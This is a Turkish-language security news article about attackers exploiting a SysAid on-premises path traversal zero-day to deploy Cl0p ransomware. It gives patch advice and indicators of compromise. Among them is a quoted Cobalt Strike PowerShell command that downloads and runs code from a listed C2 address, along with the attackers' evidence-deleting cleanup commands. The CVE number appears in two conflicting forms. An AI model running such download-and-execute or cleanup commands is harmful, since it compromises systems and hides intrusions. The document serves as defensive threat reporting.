Daha önce bildirildiği gibi SysAid, şirket içi SysAid sunucularını etkileyen sıfır gün sorununu açıkladı. Güvenlik açığının bir yol geçiş güvenlik açığı olduğu tespit edildi ve CVE-2023-47426 verildi.
Ek olarak SysAid, Lace Tempest’in bu güvenlik açığından yararlandığına dair raporların bulunduğunu belirtti.
Ayrıca Microsoft Tehdit İstihbarat Ekibi analizi, Lace Tempest tehdit aktörünün etkilenen sistemlere Cl0p fidye yazılımını dağıtmak için bu güvenlik açığından yararlandığını belirtti.
Bu tehdit aktörü, MOVEit Transfer uygulamalarını ve GoAnywhere MFT gasp saldırılarını istismar edenle aynı kişidir.
Rapid7 Analizi
Cyber Security News ile paylaşılan raporlara göre Rapid7, SysAid sunucularındaki bu güvenlik açığını analiz ediyor. SysAid’in güvenlik uyarısında, tehdit aktörünün bu güvenlik açığını WebShell ve diğer yüklerden oluşan bir WAR arşivi yüklemek için kullandığı belirtildi.
Bunlar, istismarın bir parçası olarak SysAid’in Tomcat web hizmetinin köküne yüklendi. Ayrıca tehdit aktörlerinin istismar amacıyla spoolsv.exe, msiexec.exe ve svchost.exe olmak üzere üç işlemi kullandığı da bildirildi.
Ancak, yararlanma sonrası, MeshAgent uzaktan yönetim aracı ve GraceWire kötü amaçlı yazılımının etkilenen cihazlara dağıtılmasıyla gerçekleştirildi.
SysAid, 5000 müşteriye sahip olduğunu iddia ediyor ve risk azaltma adımları için onlarla proaktif olarak iletişim kuruyor. SysAid ayrıca bu güvenlik açıklarını gidermek için yamalar yayınladı.
StorageGuard yüzlerce depolama ve yedekleme cihazındaki yanlış güvenlik yapılandırmalarını ve güvenlik açıklarını tarar, tespit eder ve düzeltir.
StorageGuard’ı Ücretsiz Deneyin
Azaltma
SysAid Şirket içi sunucularda bulunan CVE-2023-47246, 23.3.36 sürümünde düzeltilebilmektedir. Tehdit aktörlerinin sunuculardaki zayıf noktalardan yararlanmasını engellemek için SysAid sunucu müşterilerinin öncelikli olarak gerekli yamaları uygulamaları önerilir.
Uzlaşma Göstergeleri
Hash’ler
| Dosya adı | Sha256 | Yorum |
| kullanıcı.exe | b5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f21f2522bf4d | Kötü amaçlı yükleyici |
| Meshagent.exe | 2035a69bc847dbad3b169cc74eb43fc9e6a0b6e50f0bbad068722943a71a4cca | Meshagent.exe uzaktan yönetici aracı |
IP Adresleri
| IP | Yorum |
| 81.19.138[.]52 | GraceWire Yükleyici C2 |
| 45.182.189[.]100 | GraceWire Yükleyici C2 |
| 179.60.150[.]34 | Kobalt Saldırısı C2 |
| 45.155.37[.]105 | Meshagent uzaktan yönetici aracı (C2) |
Dosya Yolları
| Yol | Yorum |
| C:\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exe | GraceWire |
| C:\Program Files\SysAidServer\tomcat\webapps\usersfiles.war | Saldırganın kullandığı WebShell’lerin ve araçların arşivi |
| C:\Program Files\SysAidServer\tomcat\webapps\leave | Yürütme sırasında saldırgan komut dosyaları için bayrak olarak kullanılır |
Komutlar
Kobalt Saldırısı
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w gizli -c IEX ((new-object net.webclient).downloadstring(‘http://179.60.150[.]34:80/a’)
Uzlaşma Sonrası Temizleme
Öğeyi Kaldır -Yol “$tomcat_dir\webapps\usersfiles\leave”.
Remove-Item -“$wapps\usersfiles.war”ı zorla.
Remove-Item -“$wapps\usersfiles\user.*” komutunu zorlayın.
& “$wapps\usersfiles\user.exe”.
Antivirüs Algılamaları
Truva Atı:Win32/TurtleLoader
Arka kapı: Win32/Clop
Fidye: Win32/Clop
Patch Manager Plus, 850’den fazla üçüncü taraf uygulamanın otomatik güncellemesi için tek noktadan çözüm: Ücretsiz Denemeyi Deneyin.